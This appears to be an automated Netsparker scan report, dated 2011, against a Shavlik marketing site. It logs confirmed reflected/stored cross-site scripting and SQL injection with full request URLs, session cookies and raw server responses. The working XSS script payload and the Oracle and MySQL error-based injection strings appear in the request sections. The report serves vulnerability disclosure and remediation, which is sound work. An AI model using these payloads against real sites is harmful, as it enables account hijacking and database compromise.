h GET '"--></style></script><script>alert(0x0009F6)</script>
hp GET 697
utm_term GET vulnerability management
utm_campaign GET PatchManagement
utm_mt GET e
gclid GET CPC_jKTPt6gCFUh-5QodsROzEA

Request

GET /shavlik/index.cfm?m=1112&pg=697&h='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0009F6)%3C/script%3E&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Cookie: CFID=799689; CFTOKEN=67476078
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:17:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
































































































































<iframe name = "regFrame" id = "regFrame" style="display:none;" width="800" height=400></iframe>
<iframe name = "regFrame2" id = "regFrame2" style="display:none;" width="800" height=400></iframe>

<script type="text/javascript">

function formCheck() {

retValue = false;

if(document.getElementById('m_txtFirstName').value == "" || document.getElementById('m_txtFirstName').value.length < 2 || document.getElementById('m_txtFirstName').value.length > 55)
{
alert("Please enter your First Name, between 2 and 55 characters");
}

else if(document.getElementById('m_txtLastName').value == "" || document.getElementById('m_txtLastName').value.length < 2 || document.getElementById('m_txtLastName').value.length > 55)
{
alert("Please enter your Last Name, between 2 and 55 characters");
}

else if(document.getElementById('m_txtEmail').value == "")
{
alert("Please enter your email address");
}

else if((document.getElementById('m_txtEmail').value.indexOf(".") == -1) || document.getElementById('m_txtEmail').value.indexOf("@") == -1)
{
alert("Please enter a valid email address");
}

else if(document.getElementById('m_txtPhone').value == "" || document.getElementById('m_txtPhone').value.length < 10 || document.getElementById('m_txtPhone').value.length > 50)
{
alert("Please enter your Phone Number, at least 10 characters");
}

else if(document.getElementById('m_txtCompany').value == "")
{
alert("Please enter your Company Name");
}
else if(document.getElementById('m_ddlStates').value == 0)
{
alert("Please Choose Your State");
}
else if(document.getElementById('sEmployees').value == '')
{
alert("Please Choose the size of your company");
}
else if(document.getElementById('sTitle').value == '')
{
alert("Please Choose your job title");
}

else
{
sLN = document.getElementById('m_txtLastName').value;


document.getElementById('DownloadInfo').action = '/shavlik/download.cfm?nFileID=0&pg=697';
document.getElementById('DownloadInfo').target = 'regFrame2';
document.getElementById('DownloadInfo').submit();

document.getElementById('m_txtLastName').value += ' -O';

if(document.getElementById('netchk').checked == 1)
{
empNode = document.getElementById('sEmployees');
empNode.parentNode.removeChild(empNode);

titleNode = document.getElementById('sTitle');
titleNode.parentNode.removeChild(titleNode);

document.getElementById('DownloadInfo').action = 'http://www.shavlik.com/pDownloadForm4.aspx';
document.getElementById('DownloadInfo').target = 'regFrame';
document.getElementById('DownloadInfo').submit();

}

document.getElementById('m_txtLastName').value = sLN;

if(document.getElementById('netchk').checked == 1){
sNET = document.getElementById('netchk').value = 1;
}
else
{
sNET = document.getElementById('netchk').value = 0;
}

if(document.getElementById('caseStudy').checked == 1)
{
sCASE = document.getElementById('caseStudy').value = 1;
}
else
{
sCASE = document.getElementById('caseStudy').value = 0;
}

if(document.getElementById('webinar').checked == 1)
{
sWEB = document.getElementById('webinar').value = 1;
}
else
{
sWEB = document.getElementById('webinar').value = 0;
}

retValue = true;

sUrl = 'thank.cfm?bnetchk=' + sNET + '&bcaseStudy=' + sCASE + '&bwebinar=' + sWEB;

Shadowbox.open({
content: sUrl,
player: "iframe",
width: 500,
height: 400
});



}

return retValue;
}



</script>



































































<!-- caught error -->
<!-- '--></style></script><script>netsparker(0x0009F6)</script>|697 -- -->















































































































































<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Security software - Free trial Shavlik automated patch mgmt + antivirus</title>


<link rel="stylesheet" href="style/style5.css" type="text/css" media="all" />
<!--[if IE 6]>
<style>
#navitem a {padding-bottom:0px;}
</style>
<![endif]-->
<script language="javascript" type="text/javascript">
function windowOpen(sURL, bFade, sWindowName) {

if (bFade) {
document.getElementById("body").style.backgroundColor = "gray";
}

sWindowName = sWindowName || "newWindow";

nPosX = (window.screen.width/2) - (400);
nPosY = (window.screen.height/2) - (350 + 75);

newWindow = window.open(sURL,sWindowName,"status=0,toolbar=0,scrollbars=1,width=800,height=600,screenX=" + nPosX + ",screenY=" + nPosY);

newWindow.focus();

}


var req;

function docLoad(url) {
req = false;
// non IE
if(window.XMLHttpRequest && !(window.ActiveXObject)) {
try {
req = new XMLHttpRequest();
} catch(e) {
req = false;
}
// IE
} else if(window.ActiveXObject) {
try {
req = new ActiveXObject("Msxml2.XMLHTTP");
} catch(e) {
try {
req = new ActiveXObject("Microsoft.XMLHTTP");
} catch(e) {
req = false;
}
}
}

if(req) {
//req.onreadystatechange = processReqChange;
req.open("GET", url, false);
req.send("");

}

//req = false;

}

function downloadRecord(fileID)
{

sURL = "download.cfm?nFileID=" + fileID + "&a=1";
docLoad(sURL);

}


</script>
<link rel="stylesheet" type="text/css" href="shadowbox/shadowbox.css">
<script type="text/javascript" src="shadowbox/shadowbox.js"></script>
<script type="text/javascript">

function userCheck(sURL,nID) {

docLoad('userCheck.cfm');

if (req.responseText == 'num0') {

Shadowbox.open({
content: 'download.cfm?nFileID=0&a=1',
player: "iframe"
});

return true;

}

else if (sURL.search('.wmv') != -1) {

Shadowbox.open({
content: sURL,
player: "html",
width: 700,
height: 570

});

downloadRecord(nID);

return true;

}

else {

Shadowbox.open({
content: sURL,
player: "flv",
width: 640,
height: 364

});

downloadRecord(nID);

return true;
}

}

Shadowbox.init({
modal: true

});

</script>

<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-22410401-11']);
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

</script>


</head>








































































































































































































































































<body> <div id="wrapper"> <div style="background-image:url('images/SHAV_topBar.jpg'); background-repeat:no-repeat; height:30px;"></div> <div id="container"> <div id="logo"> <a href="index.cfm?pg=374" target="_blank"><img src="images/SHAV_INT_downloadForm_btn.jpg" style="border:none; float:right; margin-right:20px;"></a> </div> <div id="topContainer"> <img src="images/Shav_LP_serious_safe.png" style="margin:-25px 0 -20px 65px; position:absolute;">

<div id="content">
<h1 style="font-size:40px; margin-top:0;">Comprehensive security software that can make life easier</h1>
<img src="images/SHAV_LP_patch_logo.png">

<p class="contentCopy">
<strong>NetChk®</strong> Protect is the comprehensive agentless patch management system designed to meet today’s most pressing IT challenges. NetChk® Protect simplifies the complexity of IT management by automating patching – for both your operating system and for third-party applications – so you’re protected from every angle.
<br /><br />
In less than 30 minutes, <strong>NetChk®</strong> Protect will be up and running, detecting and deploying missing patches.
<br /><br />
<strong>NetChk®</strong> Protect also includes the Sunbelt VIPRE Enterprise Antivirus + Antispyware + Antimalware engine to integrate world-class antivirus protection with comprehensive patch management for faster, more cost-effective network security.
</p>
</div>
<div style="background-image:url('images/SHAV_blackLine.jpg'); background-repeat:no-repeat; height:19px;"></div> </div> <div id="bottomContainer"><!--- bottomContainer ---> <div id="leftBottom">
<a href="index.cfm?pg=704" style="text-decoration:none;"><h2>SimplexITy Bundle Savings of 80% <img src="images/Shav_LP_serious_arrow.png" style="border:0;"></h2></a>

<h3 style="font-style:italic;">For a limited time, the more Shavlik IT Management products you use, the more you save.</h3>
<p class="bottomCopy">NetChk® Protect is part of the Shavlik SimplexITy Bundle, the ultimate IT management solution for network professionals. Combining our best-in-class network security and IT management applications, the bundle is the comprehensive answer to your patch management, antivirus, power management, and configuration challenges.</p>

<h3 style="font-style:italic;">Explore the Shavlik SimplexITy Bundle:</h3>

<p class="bottomCopy">Click on the links below for detailed information on each functionality that can simplify your IT workload:</p>

<ul class="bottomCopy" style="margin-left:15px; padding:0; line-height:26px;">
<li><a href="index.cfm?pg=697" class="current">Automated Patch Management</a></li>
<li><a href="index.cfm?pg=698">Next-generation Enterprise Antivirus</a></li>
<li><a href="index.cfm?pg=701">Centralized Power Management</a></li>
<li><a href="index.cfm?pg=699">Simplified Configuration and Compliance</a></li>
</ul>
</div> <div id="middleBottom">
<p class="bottomCopy" style="margin-top:0;">For a fraction of the money you spend for antivirus protection today, you can simplify the complexity of IT management and have complete protection against your top security threats.</p>

<img src="images/Shav_LP_serious_piggyBank.jpg" style="padding-top:10px;">
</div> <!--- formDIV ---> <div id="rightBottom"> <tr> <td> <form name="DownloadInfo" method="post" action="http://www.shavlik.com/pDownloadForm4.aspx" id="DownloadInfo" style="text-align: center;" target="regFrame"> <p id="formHeader">Download a FREE Trial Today</p>

<p class="bottomCopy" style="margin-bottom:0;">Register today to try Shavlik’s NetChk® Protect patch management - or save even more by upgrading to the SimplexITy bundle! <span style="font-style:italic; font-size:11px;">* Denotes Required Fields</span></p>

<div style="display:none;">
<input type="checkbox" name="caseStudy" id="caseStudy" value="1">

<input type="checkbox" name="webinar" id="webinar" value="1">

<input type="checkbox" name="netchk" id="netchk" value="1" checked>
</div> <input type="hidden" name="__EVENTTAR..
Permanent Cross-site Scripting

Permanent Cross-site Scripting

1 TOTAL
IMPORTANT
CONFIRMED
1

Netsparker confirmed this vulnerability by analyzing the execution of injected JavaScript.

Permanent XSS (Cross-site Scripting) allows an attacker to execute dynamic scripts (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly and to steal the user's credentials. This happens because the input entered by the user has been interpreted by HTML/Javascript/VbScript within the browser.

Permanent means that the attack will be stored in the back-end system. In normal XSS attacks an attack needs to e-mail the victim but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.

XSS in learn.shavlik.com, DORK, Cross Site Scripting, CWE-79, CAPEC-86 XSS in learn.shavlik.com, DORK, Cross Site Scripting, CWE-79, CAPEC-86

XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' session the attacker might attack an administrator to gain full control over the application.

Impact

Permanent XSS is a dangerous issue that has many exploitation vectors, some of which includes:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /shavlik/index.cfm

/shavlik/index.cfm CONFIRMED

http://learn.shavlik.com/shavlik/index.cfm?m=1112&pg=697&h=0&hp=%27%7C%7C(utl_inaddr.get_host_addres..

Injection URL

http://learn.shavlik.com/shavlik/index.cfm?m=1112&pg=697&h='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0009F6)%3C/script%3E&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA

Injection Request

GET /shavlik/index.cfm?m=1112&pg=697&h='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0009F6)%3C/script%3E&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Cookie: CFID=799689; CFTOKEN=67476078
Accept-Encoding: gzip, deflate

Identification Request

GET /shavlik/index.cfm?m=1112&pg=697&h=0&hp=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Cookie: CFID=799689; CFTOKEN=67476078
Accept-Encoding: gzip, deflate

Injection Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:17:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


Identification Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:17:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
































































































































<iframe name = "regFrame" id = "regFrame" style="display:none;" width="800" height=400></iframe>
<iframe name = "regFrame2" id = "regFrame2" style="display:none;" width="800" height=400></iframe>

<script type="text/javascript">

function formCheck() {

retValue = false;

if(document.getElementById('m_txtFirstName').value == "" || document.getElementById('m_txtFirstName').value.length < 2 || document.getElementById('m_txtFirstName').value.length > 55)
{
alert("Please enter your First Name, between 2 and 55 characters");
}

else if(document.getElementById('m_txtLastName').value == "" || document.getElementById('m_txtLastName').value.length < 2 || document.getElementById('m_txtLastName').value.length > 55)
{
alert("Please enter your Last Name, between 2 and 55 characters");
}

else if(document.getElementById('m_txtEmail').value == "")
{
alert("Please enter your email address");
}

else if((document.getElementById('m_txtEmail').value.indexOf(".") == -1) || document.getElementById('m_txtEmail').value.indexOf("@") == -1)
{
alert("Please enter a valid email address");
}

else if(document.getElementById('m_txtPhone').value == "" || document.getElementById('m_txtPhone').value.length < 10 || document.getElementById('m_txtPhone').value.length > 50)
{
alert("Please enter your Phone Number, at least 10 characters");
}

else if(document.getElementById('m_txtCompany').value == "")
{
alert("Please enter your Company Name");
}
else if(document.getElementById('m_ddlStates').value == 0)
{
alert("Please Choose Your State");
}
else if(document.getElementById('sEmployees').value == '')
{
alert("Please Choose the size of your company");
}
else if(document.getElementById('sTitle').value == '')
{
alert("Please Choose your job title");
}

else
{
sLN = document.getElementById('m_txtLastName').value;


document.getElementById('DownloadInfo').action = '/shavlik/download.cfm?nFileID=0&pg=697';
document.getElementById('DownloadInfo').target = 'regFrame2';
document.getElementById('DownloadInfo').submit();

document.getElementById('m_txtLastName').value += ' -O';

if(document.getElementById('netchk').checked == 1)
{
empNode = document.getElementById('sEmployees');
empNode.parentNode.removeChild(empNode);

titleNode = document.getElementById('sTitle');
titleNode.parentNode.removeChild(titleNode);

document.getElementById('DownloadInfo').action = 'http://www.shavlik.com/pDownloadForm4.aspx';
document.getElementById('DownloadInfo').target = 'regFrame';
document.getElementById('DownloadInfo').submit();

}

document.getElementById('m_txtLastName').value = sLN;

if(document.getElementById('netchk').checked == 1){
sNET = document.getElementById('netchk').value = 1;
}
else
{
sNET = document.getElementById('netchk').value = 0;
}

if(document.getElementById('caseStudy').checked == 1)
{
sCASE = document.getElementById('caseStudy').value = 1;
}
else
{
sCASE = document.getElementById('caseStudy').value = 0;
}

if(document.getElementById('webinar').checked == 1)
{
sWEB = document.getElementById('webinar').value = 1;
}
else
{
sWEB = document.getElementById('webinar').value = 0;
}

retValue = true;

sUrl = 'thank.cfm?bnetchk=' + sNET + '&bcaseStudy=' + sCASE + '&bwebinar=' + sWEB;

Shadowbox.open({
content: sUrl,
player: "iframe",
width: 500,
height: 400
});



}

return retValue;
}



</script>































































<!-- caught error -->
<!-- '--></style></script><script>netsparker(0x0009F6)</script>|697 -- -->















































































































































<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Security software - Free trial Shavlik automated patch mgmt + antivirus</title>


<link rel="stylesheet" href="style/style5.css" type="text/css" media="all" />
<!--[if IE 6]>
<style>
#navitem a {padding-bottom:0px;}
</style>
<![endif]-->
<script language="javascript" type="text/javascript">
function windowOpen(sURL, bFade, sWindowName) {

if (bFade) {
document.getElementById("body").style.backgroundColor = "gray";
}

sWindowName = sWindowName || "newWindow";

nPosX = (window.screen.width/2) - (400);
nPosY = (window.screen.height/2) - (350 + 75);

newWindow = window.open(sURL,sWindowName,"status=0,toolbar=0,scrollbars=1,width=800,height=600,screenX=" + nPosX + ",screenY=" + nPosY);

newWindow.focus();

}


var req;

function docLoad(url) {
req = false;
// non IE
if(window.XMLHttpRequest && !(window.ActiveXObject)) {
try {
req = new XMLHttpRequest();
} catch(e) {
req = false;
}
// IE
} else if(window.ActiveXObject) {
try {
req = new ActiveXObject("Msxml2.XMLHTTP");
} catch(e) {
try {
req = new ActiveXObject("Microsoft.XMLHTTP");
} catch(e) {
req = false;
}
}
}

if(req) {
//req.onreadystatechange = processReqChange;
req.open("GET", url, false);
req.send("");

}

//req = false;

}

function downloadRecord(fileID)
{

sURL = "download.cfm?nFileID=" + fileID + "&a=1";
docLoad(sURL);

}


</script>
<link rel="stylesheet" type="text/css" href="shadowbox/shadowbox.css">
<script type="text/javascript" src="shadowbox/shadowbox.js"></script>
<script type="text/javascript">

function userCheck(sURL,nID) {

docLoad('userCheck.cfm');

if (req.responseText == 'num0') {

Shadowbox.open({
content: 'download.cfm?nFileID=0&a=1',
player: "iframe"
});

return true;

}

else if (sURL.search('.wmv') != -1) {

Shadowbox.open({
content: sURL,
player: "html",
width: 700,
height: 570

});

downloadRecord(nID);

return true;

}

else {

Shadowbox.open({
content: sURL,
player: "flv",
width: 640,
height: 364

});

downloadRecord(nID);

return true;
}

}

Shadowbox.init({
modal: true

});

</script>

<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-22410401-11']);
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

</script>


</head>








































































































































































































































































<body> <div id="wrapper"> <div style="background-image:url('images/SHAV_topBar.jpg'); background-repeat:no-repeat; height:30px;"></div> <div id="container"> <div id="logo"> <a href="index.cfm?pg=374" target="_blank"><img src="images/SHAV_INT_downloadForm_btn.jpg" style="border:none; float:right; margin-right:20px;"></a> </div> <div id="topContainer"> <img src="images/Shav_LP_serious_safe.png" style="margin:-25px 0 -20px 65px; position:absolute;">

<div id="content">
<h1 style="font-size:40px; margin-top:0;">Comprehensive security software that can make life easier</h1>
<img src="images/SHAV_LP_patch_logo.png">

<p class="contentCopy">
<strong>NetChk®</strong> Protect is the comprehensive agentless patch management system designed to meet today’s most pressing IT challenges. NetChk® Protect simplifies the complexity of IT management by automating patching – for both your operating system and for third-party applications – so you’re protected from every angle.
<br /><br />
In less than 30 minutes, <strong>NetChk®</strong> Protect will be up and running, detecting and deploying missing patches.
<br /><br />
<strong>NetChk®</strong> Protect also includes the Sunbelt VIPRE Enterprise Antivirus + Antispyware + Antimalware engine to integrate world-class antivirus protection with comprehensive patch management for faster, more cost-effective network security.
</p>
</div>
<div style="background-image:url('images/SHAV_blackLine.jpg'); background-repeat:no-repeat; height:19px;"></div> </div> <div id="bottomContainer"><!--- bottomContainer ---> <div id="leftBottom">
<a href="index.cfm?pg=704" style="text-decoration:none;"><h2>SimplexITy Bundle Savings of 80% <img src="images/Shav_LP_serious_arrow.png" style="border:0;"></h2></a>

<h3 style="font-style:italic;">For a limited time, the more Shavlik IT Management products you use, the more you save.</h3>
<p class="bottomCopy">NetChk® Protect is part of the Shavlik SimplexITy Bundle, the ultimate IT management solution for network professionals. Combining our best-in-class network security and IT management applications, the bundle is the comprehensive answer to your patch management, antivirus, power management, and configuration challenges.</p>

<h3 style="font-style:italic;">Explore the Shavlik SimplexITy Bundle:</h3>

<p class="bottomCopy">Click on the links below for detailed information on each functionality that can simplify your IT workload:</p>

<ul class="bottomCopy" style="margin-left:15px; padding:0; line-height:26px;">
<li><a href="index.cfm?pg=697" class="current">Automated Patch Management</a></li>
<li><a href="index.cfm?pg=698">Next-generation Enterprise Antivirus</a></li>
<li><a href="index.cfm?pg=701">Centralized Power Management</a></li>
<li><a href="index.cfm?pg=699">Simplified Configuration and Compliance</a></li>
</ul>
</div> <div id="middleBottom">
<p class="bottomCopy" style="margin-top:0;">For a fraction of the money you spend for antivirus protection today, you can simplify the complexity of IT management and have complete protection against your top security threats.</p>

<img src="images/Shav_LP_serious_piggyBank.jpg" style="padding-top:10px;">
</div> <!--- formDIV ---> <div id="rightBottom"> <tr> <td> <form name="DownloadInfo" method="post" action="http://www.shavlik.com/pDownloadForm4.aspx" id="DownloadInfo" style="text-align: center;" target="regFrame"> <p id="formHeader">Download a FREE Trial Today</p>

<p class="bottomCopy" style="margin-bottom:0;">Register today to try Shavlik’s NetChk® Protect patch management - or save even more by upgrading to the SimplexITy bundle! <span style="font-style:italic; font-size:11px;">* Denotes Required Fields</span></p>

<div style="display:none;">
<input type="checkbox" name="caseStudy" id="caseStudy" value="1">

<input type="checkbox" name="webinar" id="webinar" value="1">

<input type="checkbox" name="netchk" id="netchk" value="1" checked>
</div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTA..
Database User Has Admin Privileges

Database User Has Admin Privileges

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that the target web site is connecting to the backend database by using a user that has administrative privileges. This issue has been confirmed by checking the connection privileges via an identified SQL Injection vulnerability in the application. XSS in learn.shavlik.com, DORK, Cross Site Scripting, CWE-79, CAPEC-86

Impact

This can allow an attacker to gain extra privileges via SQL Injection attacks. Here is the list of attacks that the attacker might carry out:

Remedy

Create a database user with the least possible permissions for your application and connect to the database with that user. Always follow the principle of providing the least privileges for all users and applications.

External References

- /shavlik/index.cfm

/shavlik/index.cfm CONFIRMED

http://learn.shavlik.com/shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CO..

Request

GET /shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Cookie: CFID=799689; CFTOKEN=67476078
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 25 Apr 2011 12:16:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
































































































































<iframe name = "regFrame" id = "regFrame" style="display:none;" width="800" height=400></iframe>
<iframe name = "regFrame2" id = "regFrame2" style="display:none;" width="800" height=400></iframe>

<script type="text/javascript">

function formCheck() {

retValue = false;

if(document.getElementById('m_txtFirstName').value == "" || document.getElementById('m_txtFirstName').value.length < 2 || document.getElementById('m_txtFirstName').value.length > 55)
{
alert("Please enter your First Name, between 2 and 55 characters");
}

else if(document.getElementById('m_txtLastName').value == "" || document.getElementById('m_txtLastName').value.length < 2 || document.getElementById('m_txtLastName').value.length > 55)
{
alert("Please enter your Last Name, between 2 and 55 characters");
}

else if(document.getElementById('m_txtEmail').value == "")
{
alert("Please enter your email address");
}

else if((document.getElementById('m_txtEmail').value.indexOf(".") == -1) || document.getElementById('m_txtEmail').value.indexOf("@") == -1)
{
alert("Please enter a valid email address");
}

else if(document.getElementById('m_txtPhone').value == "" || document.getElementById('m_txtPhone').value.length < 10 || document.getElementById('m_txtPhone').value.length > 50)
{
alert("Please enter your Phone Number, at least 10 characters");
}

else if(document.getElementById('m_txtCompany').value == "")
{
alert("Please enter your Company Name");
}
else if(document.getElementById('m_ddlStates').value == 0)
{
alert("Please Choose Your State");
}
else if(document.getElementById('sEmployees').value == '')
{
alert("Please Choose the size of your company");
}
else if(document.getElementById('sTitle').value == '')
{
alert("Please Choose your job title");
}

else
{
sLN = document.getElementById('m_txtLastName').value;


document.getElementById('DownloadInfo').action = '/shavlik/download.cfm?nFileID=0&pg=697';
document.getElementById('DownloadInfo').target = 'regFrame2';
document.getElementById('DownloadInfo').submit();

document.getElementById('m_txtLastName').value += ' -O';

if(document.getElementById('netchk').checked == 1)
{
empNode = document.getElementById('sEmployees');
empNode.parentNode.removeChild(empNode);

titleNode = document.getElementById('sTitle');
titleNode.parentNode.removeChild(titleNode);

document.getElementById('DownloadInfo').action = 'http://www.shavlik.com/pDownloadForm4.aspx';
document.getElementById('DownloadInfo').target = 'regFrame';
document.getElementById('DownloadInfo').submit();

}

document.getElementById('m_txtLastName').value = sLN;

if(document.getElementById('netchk').checked == 1){
sNET = document.getElementById('netchk').value = 1;
}
else
{
sNET = document.getElementById('netchk').value = 0;
}

if(document.getElementById('caseStudy').checked == 1)
{
sCASE = document.getElementById('caseStudy').value = 1;
}
else
{
sCASE = document.getElementById('caseStudy').value = 0;
}

if(document.getElementById('webinar').checked == 1)
{
sWEB = document.getElementById('webinar').value = 1;
}
else
{
sWEB = document.getElementById('webinar').value = 0;
}

retValue = true;

sUrl = 'thank.cfm?bnetchk=' + sNET + '&bcaseStudy=' + sCASE + '&bwebinar=' + sWEB;

Shadowbox.open({
content: sUrl,
player: "iframe",
width: 500,
height: 400
});



}

return retValue;
}



</script>






































<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>

<font face="arial"></font>



<html>
<head>
<title>Error Occurred While Processing Request</title>


<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}

if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>


</head>
<body>

<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.

</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">






















<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Error Executing Database Query.
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Duplicate entry '_!@4dilemma:1' for key 1
</font>
</td>
</tr>
<tr>
<td height>&nbsp;</td>
</tr>


















<tr><td>

<table border="0" cellpadding="0" cellspacing="0">



</table>
</td></tr>




<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>

<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debug Output Settings, and select the Robust Exception Information option.</li>


<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a> to find a solution to your problem.</li>

</ul>
<p>
</td>
</tr>

<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)</td>
